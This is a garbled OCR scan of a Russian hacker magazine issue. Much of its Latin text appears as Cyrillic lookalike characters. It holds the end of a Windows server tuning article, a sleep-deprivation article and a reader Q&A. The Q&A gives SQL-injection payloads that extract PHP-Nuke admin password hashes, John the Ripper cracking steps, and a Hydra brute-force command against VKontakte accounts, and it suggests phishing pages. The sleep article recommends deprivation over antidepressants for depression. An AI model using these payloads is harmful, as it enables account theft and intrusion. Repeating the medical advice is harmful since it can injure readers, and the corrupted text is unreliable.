161і выпуске «Ехріоіщ Кеѵіеѵѵ», опубликованном в журнале 
«] [акер». Ну а для преодоления ВЗСЮ достаточно вызывать 

дііадз . ехе с флагом сИр. 

Хочется отметить, что основными поставщиками ВЗСЮ 
являются драйвера видео- и звуковых карт, поэтому удаляем 
драйвер звуковой карты (а зачем серверу звук?) и для фор- 
сиров анияѴСА режима в ЪооЬ . іпі прописываем ключик 

/ВАЗЕѴШЕО. 

Еще одну проблему представляет собой поддержка расшире- 
ний физических адресов (РЬузісаІ АсШгезз Ехіепзіопз или 
сокращенно РАЕ) . Теоретически она позволяет операцион- 
ной системе использовать свыше 4х Гб физической памяти, 
практически же ѴѴіп2кЗ Згапсіагсі ЕсНгіоп этой возможности 
не поддерживает, вынуждая нас искать ЕпГегргізе Ебігіоп. 
Однако при активном механизме ОЕР фага ЕхесиГіоп 
РгеѵепГіоп), включенном по умолчанию в ѴѴіп2кЗ 5Р1, сис- 
тема всегда стартует с поддержкой РАЕ, независимо от коли- 
чества физической памяти, имеющейся на борту. Это создает 
проблемы с некоторыми драйверами, поскольку в режиме 
РАЕ на уровне ядра имеются некоторые тонкости работы с 
памятью, учитываемые далеко не всеми разработчиками. 
Очевидное решение — добавить ключ /ЫОРАЕвЬооІ . іпі и 
забыть об этой проблеме раз и навсегда. 

Остальные проблемы с ВЗОО’ами решаются эксперимен- 
тальным путем посредством манипуляций с ключами 
реестра, перечисленными в таблице «Ключи реестра, 
ответственные за конфигурирование ядра» (ты найдешь ее 
на прилагаемом к журналу диске) . 

ЗАКЛЮЧЕНИЕ 

Настройку сервера удобнее осуществлять под виртуальной 
машиной типа ѴМ ѴѴаге, выделяя гостевой операционной 
системе минимум памяти и направляя на нее шторм сетевых 
пакетов. При наличии «кривых» драйверов ВЗОБ не заставит 
себя ждать и тут же появится на экране. К сожалению, ѴМ 
ѴѴаге не дает прямого доступа к большинству компонентов 
материнской платы. Поэтому тестируются совсем не те драй- 
вера, которые работают в реальных условиях. Но даже такой 
примитивный тестовый стенд выявляет огромное количество 
ошибок, позволяя подобрать оптимальные ключи реестра и 
файла ЬооГ.іпі. Окончательную настройку ядра можно выпол- 
нить уже в натурных условиях, естественно, предварительно 
создав резервную копию Ъооі . іпі и реестра с помощью 
любой утилиты резервирования, работающей до загрузки 
ѴѴіп2кЗ (поскольку есть шанс, что после наших эксперимен- 
тов операционка вообще не сможет загрузиться) .цс 
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ФИЛИГРАННАЯ ТЕХНИКАТРАНСФОРМАЦИИ СНА 



ому из программистов не известна хроническая нехватка времени? Уда 



ые темпы работы и вместе с тем: масса интересных вещей (книги, ( 



— и ведь так хочется все успеть! Уменьшив количество часов 









сна, можно не только переделать накопившиеся дела, но и повысить креа- 






I 



ивность, и избавиться от депрессии. Впрочем, измененное состояние соз- 



ания, сопровождающееся галлюцинациями, тоже можно заработать... 




Постер фильма «Метепіо» («Помни»), наглядно 
демонстрирующего роль кратковременной 
памяти 



Меры 

предосторожности 

Депривация сна (особенно продолжительная) предъявляет жесткие 
требования к безопасности. В это время категорически запрещается 
садиться за руль и пользоваться станками и механизмами, способны- 
ми нанести увечье. Не рекомендуется выходить из дома (особенно 
на проезжую часть), а также заниматься деятельностью, требующей 
повышенного внимания. 

Перед началом экспериментов следует выспаться и выкроить дос- 
таточный промежуток свободного времени, в течение которого нет 
никаких неотложных дел. 

Депривация — это не волшебная палочка. Это ретивый необъезжен- 
ный конь, которым еще предстоит научиться управлять! 



двух статьях — «Эіеер» и «Эіеер бергіѵабоп» — причем, первая 
подробнее, хотя и содержит внутренние противоречия (это 
странно, учитывая, что состояние сна изучается уже доволь- 
но давно). Потеме имеется множество экспериментальных 
данных, научных работ, еіс, но, увы, мне не попадалось ни 
одной книжки, описывающей сложную научную заумь простым 
языком. 

^ ВИДЫ ДЕПРИВАЦИИ СНА 

Депривацию различаюттотальную и частичную. При тоталь- 
ной человек не спит в течение одних суток и последующего 
дня (-36 часов бодрствования). Затем наступаетздоровый 
продолжительный сон (-12 часов), после которого человек 
спит/бодрствует «в обычном режиме». Новичку лучше не 
практиковать тотальную депривацию чаще двух раз в неделю. 
Естественно, цифры приблизительные и не учитывают инди- 
видуальные особенности. В медицинских целях (для борьбы с 
дегрессиями) рекомендуется начинать с двухразовой депри- 
вации, вызывающей на первых порах кратковременное улуч- 
шение психического состояния. После закрепления эффекта 
— лишать себя сна только раз в неделю (все-таки, стресс). 
Обычно для выхода из депрессивного состояния достаточно 
6-9 сеансов (и не нужно лопать антидепрессанты, имеющие 
кучу противопоказаний и побочных действий!). 

При частичной депривации продолжительность сна сокра- 
щается до ~4х часов — на протяжении от одной до трех недель 
(а у некоторых недосыпание становится нормой жизни). По 
утверждениям одних, частичная депривация переносится 
намного легче тотальной, другие считают, что все как раз на- 
оборот— мол, возникаютпроблемы с засыпанием (приходится 



прибегать кснотворным), сон становится нервным, неглубо- 
ким, а после пробуждения во всем теле ощущается разбитость, 
и голова будто свинцом налита. Иногда организм входит в 
новый ритм уже на третий день, а иногда... упорно отказывает- 
ся функционировать на урезанном «пайке». Работа идет вяло, 
никакихтворческих мыслей в голове не появляется. 

Такчто, какой виддепривации предпочтительнее, определя- 
ется типом личности. К примеру, автор статьи принадлежит 
кпервомутипу и легко переноситЗб-часовой рабочий «ма- 
рафон», после чего впадает в спячку, просыпаясь бодрым и 
отдохнувшим. А вотхронический недосып конкретно выбивает 
из колеи, требуя длительного периода регенерации! 
Существует еще так называемая РЕМ-депривация, но ее 
трудно осуществить в домашнихусловиях, поскольку она 
проводится под контролем ЭЭГ с записью движения глаз. При 
появлении на ЭЭГ характерных признаков фазы «быстрого» 
сна человека будят, потом он вновь засыпает — до очередной 
«быстрой» фазы. И так всю ночь! В силу невысокой распро- 
страненности методики достоверных сведений о ее эффектив- 
ности нет. 

0 ПАРАДОКСЫ ДЕПРИВАЦИИ 

Вот мы и подошли к самой интересной части нашего повество- 
вания. Аименно — что же (поданным современной медицины) 
происходите организмом при депривации сна? Сначала не- 
обходимо разобраться, зачем природа вообще придумала сон. 
Помимо того, что сон является естественным отдыхом, он актив- 
но участвует в процессах метаболизма (обмена веществ). Суще- 
ствует несколько разновидностей сна, циклически сменяющих 
друг друга: медленный и быстрый сон. Во время медленного сна 
синтезируется соматотропный гормон, являющийся естест- 
венным ноотропом (он же СТП он же соматропин, он же дгоѵѵіб 
Ьогтопе). Этот гормон отвечаетза рост, усиливает синтез белка, 
предотвращает отложение жира, повышаетуровень глюкозы в 
крови, а также воздействует на центральную нервную систему (в 
результате чего улучшается память, познавательные функ- 





> ѵѵагпіпд 

Будь осторожен, никто 
не знает, кактвой 
организм отреагирует 
на частичный или 
полный отказ от сна. 
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ции и поднимается настроение). Однако, при повышенной концентрации 
соматропин вызывает депрессию. Средством, подавляющим его избыточную 
выработку, как раз и является депривация сна. 



Смена фаз 

Известно, что люди делятся на «жаворонков» и «сов», причем, про- 
граммистам по роду своей деятельности часто приходится менять 
дневную фазу работы на ночную. Существует понятие «мягкой» и 
«жесткой» смены фаз. При жесткой смене человек, находящийся, 
допустим, в ночной фазе, не спит всю ночь и весь последующий день, 
выдвигаясь на топчан только с наступлением темноты и просыпаясь 
уже в дневной фазе, в результате чего продолжительность бодрство- 
вания составляет —24 часа (классический пример депривации) . 

При мягкой смене фазы человек после пробуждения засыпает в 
«положенное» время, сокращая режим бодрствования до 6 часов. 
Считается, что мягкая смена фазы легче переносится организмом, но 
наделе это всегда индивидуально. Для мягкой смены фаз характер- 
ны проблемы с засыпанием, обычно решаемые путем применения 
снотворного (в этих случаях официальная медицина рекомендует 
применять мелаксен, отпускаемый в аптеках без рецептов) . Действи- 
тельно, трудно взять и заснуть спустя всего лишь шесть часов после 
пробуждения. «Перестройка» организма на новую фазу в этом случае 
занимает намного больше времени, на протяжении которого чело- 
век ощущает постоянную сонливость. Жесткая смена фаз, напротив, 
способствует раскрытию творческого потенциала, но это, опять- 
таки, зависит от человека. 

Существует еще и «плавающий» режим, практикуемый рядом фри- 
лансеров и позволяющий выжать из суток максимум имеющегося 
времени. Суть в том, что человек намеренно отказывается от привяз- 
ки своих внутренних биоритмов к суточному циклу и засыпает не по 
часам, а тогда, когда действительно хочет и выполнил все заплани- 
рованные дела. При вхождении в плавающий режим продолжитель- 
ность сна представляет собой константу Тз. Согласно закону веро- 
ятности, в какой-то из дней текущей работы окажется больше, чем 
вчера, и потому продолжительность бодрствования увеличится на 
Та, следовательно, завтра мы проснемся не в момент X, а в (X — Та). 
Поскольку система действует преимущественно в одном направле- 
нии (мало причин, по которым мы бы могли лечь спать раньше, но 
вот отставание от графика и задержка сна — явление вполне нор- 
мальное), мы получаем следующее: час пробуждения X непрерывно 
перемещается по циферблату, при этом происходит постоянная 
смена фаз «жаворонок»/«сова». Основная проблема — приучить себя 
засыпать на рассвете, особенно, когда восходящее солнце бьет прямо 
в глаза, насквозь простреливая даже плотные портьеры. 



Во время быстрого сна происходит восстановление пластичности нейронов 
и обогащение их кислородом; биосинтез белков и РНК-нейронов — сон 
способствует переработке и хранению информации. Медленный сон 
обеспечиваетзакрепление изученного материала, а быстрый — реализует 
подсознательные модели ожидаемых событий (периодический закон и 
формула бензола были открыты именно во сне). 

Также сон восстанавливает иммунитет. Поэтому при депривации сна лучше 
не брезговать медицинскими препаратами типа «иммунал» (благо, отпуска- 
ется без рецептов). Депривация воздействует на память, и, поутверждению 
многих источников, далеко не положительным образом. Основной удар де- 
привация наносит по кратковременной памяти (действие которой наглядно 
продемонстрировано в фильме «Метепію»). 

Кратковременная память хранит информацию считанные секунды, но она 
отвечаетза обработку данных, познавательные функции, принятие реше- 
ний, логику и так называемую «эпизодическую память», отвечающую за 
запоминание эмоций и мелких несущественных деталей. Логическое мыш- 
ление и усвояемость материала при депривации сна неизбежно снижают- 
ся, что существенно затрудняет подготовку к зачетам, экзаменам и прочим 
видам деятельности, требующим активности кратковременной памяти. 

С другой стороны, депривация сна активизирует декларативную и мето- 
дическую память. Образно говоря, декларативная память — это большой 
жесткий диск, на котором записаны все данные, накопленные нами и орга- 
низованные по принципу ассоциативных массивов. Продолжая сравнения, 
методическая память — это программный код, обрабатывающий данные, 
накопленные в декларативной памяти. При депривации сна человек 
гораздо «охотнее» вспоминаетто, что он когда-то знал, но потом «забыл», и 
намного увереннее выполняетте операции, которым был заранее обучен. 
Нетворческая работа (тупое кодирование, решение стандартных задач) как 
раз и относится ктакому классу операций, и потому порой создается впе- 
чатление, что депривация сна положительно сказывается на творческой 
деятельности, но это не так. 

Во время депривации способность «добывать» новыезнания на основании 
старых (то есть логическое мышление) притупляется (голова «не варит»), но 
посколькульвиную долю времени мы решаем задачи, с которымиуже стал- 
кивались ранее (даже если напрочьзабыли об этом), депривация оказы- 
вается неплохим подспорьем. Вместо того чтобы штудировать справочник 
по высшей математике, вспоминая, какперемножить две матрицы, просто 
забей на сон, и декларативно-методическая память решит проблему! 

Кроме того, депривация активизирует выработку гормона струднопроизно- 
симым названием ЬуроіЬаІатіс-ріШііагу-асігепаІахІБ (сокращенно, НРА). 

Он управляет реакцией на стресс (вот почему при депривации значительно 
возрастает раздражительность) и другими функциями, такими как пищева- 
рение, иммунитет, сексуальное влечение. Он же управляет использованием 
энергии, запасенной нашимтелом. 

И ЗА ГРАНЬЮ РЕАЛЬНОСТИ ИЛИ ГАЛЛЮЦИНАЦИИ — ДАРОМ! 

Теорий, объясняющих возникновение галлюцинаций (нетолько при деприва- 
ции, но и вообще), намного больше, чем одна. Поэтому придется ограничиться 
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изложением «в общих чертах». В определенных областях мозга 
(при резком повышении активности процессов) возникает что-то 
вроде паразитной положительной обратной связи, вызываю- 
щей неконтролируемое самовозбуждение нейронной сети. 

При депривации сна (угнетающей кратковременную память) 
происходит потеря информации, получаемой оторганов чувств. 

В качестве «компенсации» она замещается галлюцинациями, 
восстанавливая или сохраняя целостность образов в сознании. 
Если бодрствовать на протяжении 48 часов (или чуть меньше), 
есть шанс «словить» слуховые галлюцинации, чувство «кайфа» 
(усиленное эмоциональное восприятие), а также ощутить 
прилив деятельной креативности. При бодрствовании на 
протяжении 72 часов (и выше) начинаются яркие визуальные 
галлюцинации, появляется устойчивое чувство нереально- 
сти происходящего и видение мира, находящееся за гранью 
понимания выспавшихся людей. Интересно, что при групповой 
депривации «иное» восприятие обычно разделяется всеми 
участниками. Чувство времени утрачивается почти полностью. 
Чаще всего время словно ускоряется, и за доли секунды в голо- 
ве проносится мощный вихрь мыслей, на обдумывание которых 
в нормальном состоянии ушел бы целый день. В зависимости от 
эмоционального состояния галлюцинации могут носить как по- 
зитивный, таки негативный характер (например, лапша может 
превращаться в червей —только представь!). 

При депривации реальность (из-за расстройства кратковре- 
менной памяти и микросна) искажается настолько, что можно 
брести по городу и представлять, что находишься в лесу или 
дома за клавиатурой, что, естественно, создает прямую угрозу 
для жизни. Так что после двух -трех суток бодрствования 
лучше никуда без присмотра не выходить (не говоря уже о 
том, чтобы сесть за руль). Хотя известно много случаев, когда 
за счетулучшения работы моторной памяти люди правильно 
находили дорогу (например, из института домой), совершая 
такие «сложные» действия, как покупка билета и посадка в 
метро. Но все-таки лучше не рискуй, а то можешь проснуться 
на Кольцевой в одних подштанниках. 

Галлюцинации обычно проходятпосле ночи здорового сна 
(здорового — это значит без снотворных, единственным ис- 
ключением из которых является мелаксен, его можно). 



^ ПОБОЧНЫЕ ЭФФЕКТЫ ИЛИ ЧАС 
РАСПЛАТЫ 

Первые опыты депривации обычно 
проходят на ура. В утренние часы после 
бессонной ночи отмечается улучшение 
настроения, повышение креативности, 
отступление депрессии. Однако затем де- 
пресняк возвращается (иногда вспыхивая 
с большей силой), и единственное средст- 
во борьбы с ним (за исключением приема антидепрессантов) 

— повторный цикл депривации, проходящий уже куда более 
болезненно: с сонливостью, раздражительностью, снижением 
концентрации внимания, достигающими пика в полночь и 
перед восходом солнца (в 4-6 часовутра). 

В это время важно занять себя чем-нибудь интересным, 
требующим умственной, а не физической активности. Учти, что 
телевизор и книги (особенно, в стиле «Война и мир») сработа- 
ют как снотворное, поэтому заранее продумай план действий. 
Продолжительная тотальная депривация (свыше 36 часов) на 
первых порах может вызывать ужасные отходняки (стакими 
«радостями», как мышечная боль и психологическая ломка). 
Отметим, что физическийтруд во время депривации нето, 
чтобы противопоказан, но силовая выносливость значительно 
снижается. Очень быстро наступаетутомляемость, с которой 
трудно бороться. 

Значительное число исследований показывает, что хроническое 
недосыпание ведет к необратимым разрушениям головного 
мозга. Поэтому частичной депривацией лучше не злоупотреблять, 
а использовать полную депривацию, после которой давать себе 
ка к сл еду ет отос п аться . Та кже и м е юте я и сел е до ва н и я , до ка - 
зывающие, что депривация противопоказана людям, больным 
сахарным диабетом или предрасположенным кэтой болезни. 

Н НАУКА СНА (ЗАКЛЮЧЕНИЕ) 

Депривация сна намного более распространена, чем это может 
показаться на первый взгляд. С ней приходится сталкиваться в 
школе, в армии, в институте, на работе... Многие люди, привык- 
шие спать всего по несколько часов в сутки, абсолютно уверены, 
что это нормально. Опасное заблуждение! Хроническое недосы- 
пание, продолжающееся годами, вызывает деградацию нервной 
системы, что, в конечном счете, отнюдь не идет на пользу (осо- 
бенно людям, занятым интеллектуальной деятельностью). 
Положительный эффект дает только чередование «периодов 
воздержания отсна» с последующей «зимней спячкой», все 
прочее — негативно влияет на организм. Кстати говоря, много 
спать тоже вредно (и выше уже объяснялось, почему). Затяж- 
ные депрессии, хандра, творческие кризисы не заставят себя 
ждать и попрутиз окопов на амбразуры нашего сознания. ПС 



> ІП^О 

• Окончательная 
обработка и закреп- 
ление информации 
происходят главным 
образом во сне, 
поэтому изучение 
нового материала во 
время депривации 
невозможно или неэф- 
фективно. 

• Депривация, подав- 
ляя кратковремен- 
ную память, лишает 
нас возможности 
формировать даже 
простые логические 
построения, следо- 
вательно, решение 
нетривиальных задач 
требует значительных 
усилий. 

• Депривация активи- 
рует декларативную и 
процессуальную па- 
мять — мы вспомина- 
ем всето, чемуучили 
нас ранее. 
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Задавая вопрос, подумай! Не стоит задавать откровенно ламерские вопросы, 
ответ на которые ты при желании можешь найти и сам. Конкретизируй! 

Мы не телепаты, поэтому присылай как можно больше информации. 



Провожу инъекцию, но на выходе ничего 
не получаю, хотя колонки 1 00% существуют. 

А: Видимо, требуется использование операто- 
ра І_ІМІТ. Если первоначальный запрос выгля- 
дит примерно так: Ы: 1 р: //Іагдеі/зсгірі . 
ріір?р=-1 ипіоп зеіесѣ 1 , 2 , изег , 4 ігот 
изегз/*, то добавь Іітіі и перебирай п: 
Ы:і:р: / /Ьагдек/ зсгірі .рЬр?р=-1 ипіоп 
зеіесі 1 , 2 , изег , 4 Лгот изегз Іітіі: 
п, 1/*, где п — 0-9. 

О: Незнаю логин админа и поэтому не могу 
вытащить через 5СП_-іпіесІіоп его пароль. 
Сайт работает на РНР(Ро5()-Ыике. 

А: Как правило, в письме, подтверждающем 



регистрацию пользователей, указан е-таіі 
администратора. Поэтому делай запрос следу- 
ющего типа (названия колонок могут варьиро- 
ваться): 

ЬРЬр : / /ІосаІЬозб/тосІиІез . р1ір?ор= 
тосіі оасі&пате =Ме з в аде з & б і 1 е = г еасі 
ртзд&з!:аг1: : =9999%2 0ипіоп%2 0зе1есб 
1 , 2 , 3 , 4 , 5 , 6 ,рп_разз , 8+Ггот+пике_ 
изегз ѵгііеге рп_етаі1= ' асІтіп@ 
ІосаІЬозЪ . сот ' / * 

Также в РНР-Ыике админу обычно присваивает- 
ся рп_иі (1-2 [рп_иі <3=1 присваивается гостям 
(Апопутоиз)): 



ЬЦСр: //ІосаІЬозб/тосЗиІез . рЬр?ор= 
тод1оа(і&пате=Меззадез&Ті1е=геа(3 
ртзд&збаг1: = 9999%2 0ипіоп%2 05е1ес1: 

1 , 2 , 3 , 4 , 5 , б ,рп_разз , 8+Тгот+пике_ 
изегз мЬеге рп_иісІ=2/* 

0: Пытаюсь получить рут, используя экспло- 
иты, но ничего не выходит, хотя версия ядра 
соответствует версии, указанной в сплоите. 
Единственное, что смущает — префикс 
дгвес 

А: Скорее всего, ядро 2.6.22. 9-дгзес. 
Вообще, дгзес — это патч для ядра, делающий 
стек неисполняемым. Говоря иначе, эксплоиты 
тут не помогут. 
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0: Возможно ли в баѵа-программах перепол- 
нение буфера? 

А: Нет. Верификатор байт-кодов [Ьуѣесобе 
ѵегіИіег ] сканирует байт-коды, извлекает 
информацию отипах объектов в каждой точке 
выполнения фрагмента кода. Виртуальная 
машина баѵа предохраняет от выхода за границы 
выделенной памяти — происходит исключение, 
при этом внедренный код не будет выполнен. Не 
может произойти переполнения или «исчер- 
пания» стека, параметры для инструкций байт- 
машины имеют нужный тип, а доступ к полям и 
методам объектов не нарушает объявленных в 
классе правил [риЫіс,ргіѵаЬе,ргоЬесѣесі\. 

0: Работаю в линухе, под рукой нет никакого 
другого брутфорсера паролей кроме .іоНп 
ІЬе Кіррег, но нужно взломать гаѵѵ («сырой») 
М05. Возможно ли? 

А: Заходим на главную страницу сайта Л Р 
[ Ьир://орепѵѵа[[.сот/іоІ~)п ) и смотрим допол- 
нения к Джону, среди которых находим и под- 
держку гаѵѵ М05. Дело за малым — наструячить 
команды в консоли. Для новичков распишем 
все команды, начиная с установки ЛР. Поехали: 

тксііг зоЪп 
ссі зоЪп 

отдеб Ы:1:р : / /ѵтп . оретѵаіі . сош/ д окп/ 
Г/докп-І .7.2. баг .Ьг2 
баг -хѵб докп-1 . 7 . 2 . Саг 
ссі докп-1 .7.2 

ѵѵдеб ббр: //ббр.орегшаіі .сот/ 

риЪ/ргод есб 5 / з окп/ сопбг іЪ/ д окп- 

1 . 7 . 2-а11-9 .Йібб .дг 

дгір — (3. зоЬп-1 . 7 . 2-а11-9 . (Зібб . дг 

рабсЬ. -рі < докп-1 . 7 . 2-а11-9 . сіібб . дг 

ссі зге 

таке 

таке сіеап 1іпих-х8б-апу 

Пускаем утилиту с указанием формата и файла 
с хэшами: 

. /докп -богтаб=гаѵ7-МБ5 /коте/ 
согѵ7Іп/тс15_ка8кез . бхб . 

О: На поломанном сервере нашел конфиг для 
подключения к базе данных, залил скрипт 
для работы с СУБД, но подключиться никак 
не получается. 
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А: Вероятнее всего скрипт посылает 6ЕТ- 
запросы, которые режутся сервером. 

Используй скрипт для работы с Му5СН_/ 

М5506, посылающий Р05Т-запросы, к 
примеру, пзТѵіеѵѵ ѵЗ.1 .Розі [ ЬкрѴ/пзСѵоісІ. 
ги/?д=геІеа5е5&сіоѵѵпІоасІ=1 6 ). 

О: Провожу 506-инъекцию и пытаюсь 
получить версию МуБСП., но вместо этого 
появляется ошибка: «Шедаі тіх оі соііаііопз 
ЦаІіп1_5Ѵѵе(іІ5Ь_сі,ІМРиСІТ) апсі (иК8_ 
депегаІ_сі,5У5С0Н5Т) Гог орегаііоп И N ІОМ’» 
А: Делаем вывод в другой кодировке — вместо 
ѵегзіопО пишем сопѵегі: (ѵегзіоп () 
изіпд ІаЫпІ) . 

0: Существуют ли утилиты для переноса 
кода, написанного на языке ЫА5І., на другой 
язык программирования и наоборот? 

А: Для непосвященных: МА5І_ (Ыеззиз АНаск 
Зсгірііпд ба п диаде — язык сценариев ЫезБив) 
— это скриптовый языкдля написания сцена- 
риев для сканера Ыеззиз. На данный момент не 
существует программ для перевода ЫАЗб-сце- 
нариев на другие языки и перевода, к примеру, 
Регі-скриптов, на язык ЫАЗб. 

0: Хочу впервые воспользоваться ѴРЫ-сер- 
висом. Появилось несколько вопросов: 

1 ) Когда юзаешь ВПН, никто не узнает, что ты 
делаешь в Сети, правильно? 

2) Как для уверенности просмотреть, какой 
трафик (шифрованный/не шифрованный) 
проходит между моим ПК и ВПН-сервером? 

3) Что за технология ОоиЫе ѴРЫ? 

4) Если я сам захочу поднять ВПН-сервис, 
то на серверах какой страны это наиболее 
безопасно? 

А: 1) Если кому-то очень сильно понадобится, 
то узнаютвее и обо всем. Объясняю на пальцах. 
Провайдер будет знать, что ты подключен к 
ВПН, так как, естественно, в цепочке соедине- 
ний «ты->конечный_сервер-^пров» провайдер 
стоит раньше ѴРІЧ. Ты подключаешься кего 
шлюзу, далее к ѴРЫ-шлюзу и, наконец, к конеч- 
ному серверу. Также не стоит забывать прото, 
что на ВПНе вполне могут вестись логи. 

И еще, хочется развеять миф, что, якобы, 
предоставляемые провайдером ѴРІЧ'ы не 
шифруюттрафик и вообще бесполезны. На 
самом деле ВПН провайдера шифровать может 



и, в большинстве случаев, если с настройками, 
установленными у прова, повезет, — шифрует. 

В журнале уже писалось об ВПН, но для начала 
советую заглянуть на Википедию и ознако- 
миться с основами основ — ЬНр://ги.ѵѵікірес1іа. 
ога/ѵѵі кі/ѴРЫ . 

2) Настраиваем ѴРІЧ-подключение на вирту- 
альной машине ѴМѴѴаге, запускаем на рабочей 
системе сетевой снифер (к примеру, ЕіЬегеаІ), 
подключаем виртуальную машину к ѴРЫ-сер- 
веру, смотрим отснифаные пакеты. 

3) Поддержка двойного ІР-адреса. Соеди- 
нениесѴРЫ происходит через один сетевой 
адрес, на выходе же мы получаем совершенно 
другой. Это сделано для того, чтобы у провай- 
дера не было никаких логов по нашему ІР. 

4) Однозначного ответа нет, все опять-таки 
зависит от датацентра. Но старожилы ВПН- 
бизнеса, как правило, поднимают сервера в 
Голландии и Штатах. 

0: Иногда встречается термин «іиггіпд, 
фазеры». Что это такое? 

А: Фаззинг — это методика, основанная на 
проверке того, как приложение справляется 
с обработкой широкого диапазона случайных 
данных, заведомо составленныхтак, чтобы 
довести программу до сбоя. Примером фаззера 
может быть библиотека для біпих(апс) Воіагіз) 

— збагеіигг, предназначенная для тестиро- 
вания типичных вариантов переполнения 
локальных буферов в зеіиіеб 
Из ѵѵіпсіоѵѵз-фазеров можно отметить 0ѴѴА5Р 
бВгоРигі — фаззер уязвимостей, работает с 
НТТР, 50АР, ХМб, ШАР протоколами. Позво- 
ляет выявить Х55, ЗОЫщескоп, переполне- 
ния буфера, Р5Е и многие другие уязвимости 
крайне нестандартными методами. 

На проекте боодіе Собе можно найти еще фаз- 
зеры. К примеру, Виппу ІЬе Риііег [ ЬкрѴ/собе. 
аоодІе.сот/р/Ьиппѵ-іЬе-іиггег І — фаззер про- 
грамм, написанных на С. Работает под Ыпих, 
РгееВВО, ОрепВЗО, и Судѵѵіп. 

О: В «пособиях» по фрикингу авторы исполь- 
зуют так называемые КесІ Ьох, Віаск Ьох и 
Віие Ьох. Для чего они предназначены и что 
делают? 

А: Использование этих устройств сейчас 
достаточно сомнительно, ввиду сегодняшних 
тарифов, но все-таки, по порядку. 
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Ресі Ьох — проигрываеттоны систем автомати- 
ческого контроля оплаты в микрофон таксофо- 
на, тем самым обманывая систему и делая вид, 
что мы кинули монеты в таксофон. Вуаля, мы 
можем позвонить бесплатно :). 

Віаск Ьох является резистором, который поме- 
щают в телефонную розетку нашей телефонной 
линии. Он создает иллюзию, что при получении 
вызова мы не взяли трубку и не ответили. Счет 
за звонок не придет. 

Віие Ьох используеттон в 2600 Ьі для уп- 
равления телефонными переключателями, 
использующими полосу передачи сигнала. 
Таким образом, мы можем обратиться к одной 
из функций переключателя для установления 
телефонной связи. 

0: Как перенести почту с локального компью- 
тере на свой Стаіі-аккаунт? 

А: Если в качестве клиента ты использу- 
ешь МісгозоК ОиНоок, Оиііоок Ехргезз или 
ТЬипсіегЬігсІ, то идеально подойдет специаль- 
ная утилита Зоодіе Етаіі Ііріоасіег [ ЫТрз:// 
таіІ.доодІе.сот/таіІ/ЬеІр/етаіІ иріоасіег. 
Ьіті). Ксожалению, для пользователей ТЬе 
Ваі! пока ничего подобного не придумали. 
Может, попробуешь сам? :) 

0: Все-таки, реально ли сейчас взломать 
социальные интернет сети? 

А: В текущем месяце, эта тема, пожалуй, одна 
из самых актуальных. Каждый хочет поиметь 
аккаунт своего одногруппника/одноклассника 
и т.п. Не та к давно на сайте обпокіаззпікі.ги 
была найдена активная хбб (на момент написа- 
ния фака уязвимость не была закрыта). Тыкать 
пальцем, где она находится, не буду, так как ис- 
кать особо не придется (или смотри информа- 
цию на форуме античата). На «вконтакте» также 
существует возможность внедрения кода. 
Самым очевидным является метод брутфор- 
синга. Берем один из самых популярных 
брутфорсеров Нусіга ( ЫірѴЛгееѵѵогІсІТЬс.огд/ 
іЬс-ЬѵсІга ]. смотрим передаваемые параметры 



при авторизации и составляем (к примеру, для 
вконтакте.ру) готовый запрос для брута (запус- 
каем через командную строку/оболочку): 

Ъусіга -1 изегешаі1%40сіошаіп2;опе 
-Р раззІізД . ДхД ѵкопЕакСе. 
ги ЬЕСр-розк-Еогш " /Іодіп.рЬр: 
етаі1= /ч ІІ5ЕК л &разз= А РА53 Л : Тагдеб " 

раввіівъ . ЪхЪ — файл с паролями, 
изегетаі1%4 0с1отаіпгопе — етаіі поль- 
зователя, которого надо взломать. Например, 
а<ітіп%40ѵкопІ:ак1:е . ги :). 

Подобный запрос можно составить для любого 
сервиса, того же Одноклассники.ру, сокамер- 
ники.ру и т.п. 

Также не стоит забывать про возможность 
создания фейк-страницы с формой авториза- 
ции, которую нужно под каким-либо предлогом 
подсунуть юзеру. 

Р.5. Ищи на диске перловый брутфорсер для 
«вконтакте». 

О: Каким запросом сдампить Му5СП_-базу, 
зная имя пользователя и пароль? 

А: Ъіп/шуздісіитр --изег= {изегпате} 
--раззѵ70гсІ= {разз } --йакаЬазез 
{сІЪпате} > /Ъоте/согміп/сіитр . зді 

Итак, {изегпате} меняем на имя пользова- 
теля, {разз}, соответственно, на его пароль, 
а в {сІЪпате} указываем имя базы данных, 
которую требуется сдампить, и в конце — путь 
для сдампленной БД. 

О: Как запретить доступ к 115В флешкам в 
винде? 

А: Есть два варианта: с использованием допол- 
нительных средств и без них. Причем, первый 
будет работать во всех ЫТ-системах, а второй 
— исключительно под управлением ѴѴіпсіоѵѵб 
Бегѵег 2003/2008. Дополнительным средством 
является утилита ОеѵісеІ_оск ( ѵѵѵѵѵѵ.сіеѵісеіоск. 
сот ), которая справляется с работой на «отлич- 



но» — каждому юзеру можно выдать свой уровень 
доступа к принтерам, вертушкам, флопикам и 
любому другому железу на компах в сети (и втом 
числе — кфлешкам). Помимо этого присутствует 
замечательная опция, которая придется по вкусу 
всем любителям жесткого мониторинга — софт 
умеет сохранятьлюбую инфу, что была скачана 
с девайсов системы ил и же туда залита. Теперь 
никто из работничков неунесет секретные доки 
из офиса. Впрочем, нетакужи сложно отключить 
для пользователя системы приводы СО-ПОМ, 
Ріорру, 115В РетоѵаЫе средствами самой винды. 
Достаточно воспользоваться специальной груп- 
повой политикой в Асбѵе Оігесіогу, установив в 
систему правильный шаблон. Подробности этого 
приематы можешь прочитать здесь: ѵѵѵѵѵѵ.реігі. 
со.іІ/сІІБаЫе изб сІІБкБ ѵѵіЕЬ аро.Ыт 

О: Хочу предоставить пользователям своего 
сайта (небольшая социальная сеть) возмож- 
ность выкладывать видеоролики с опцией 
просмотра через сеть. При этом не исполь- 
зовать АРІ каких-то видеохостингов (вроде 
ѴоиТиЬе), а реализовать все исключительно 
своими силами. Не писать же видеопроигры- 
ватель на Ріазіі с нуля? 

А: Правильно мыслишь! Прежде чем что-то 
начинать писать, нужно обязательно прове- 
рить: не сделал ли кто-нибудь это за тебя? В 
твоем случае идеально подойдет Ріоѵѵріауег 
( ѵѵѵѵѵѵііоѵѵріауег.огд ) — открытый медиаплеер, 
написанный на флеш. С его помощью прямо на 
своей странице можно воспроизводить самые 
разные форматы: РБѴ, 5ѴѴР, МРЗ, МР4, И. 264. 
РІоѵѵРІауег имеет массу конфигурируемых 
настроек, при этом пользователь во время 
просмотра может перейти к любому фрагменту, 
также, как это реализовано на ѴоиТиЬе. 

0: Система постоянно стала зависать, выдавая 
синий экран смерти. Чует мое сердце, все про- 
блемы из-за нового модуля памяти, который я 
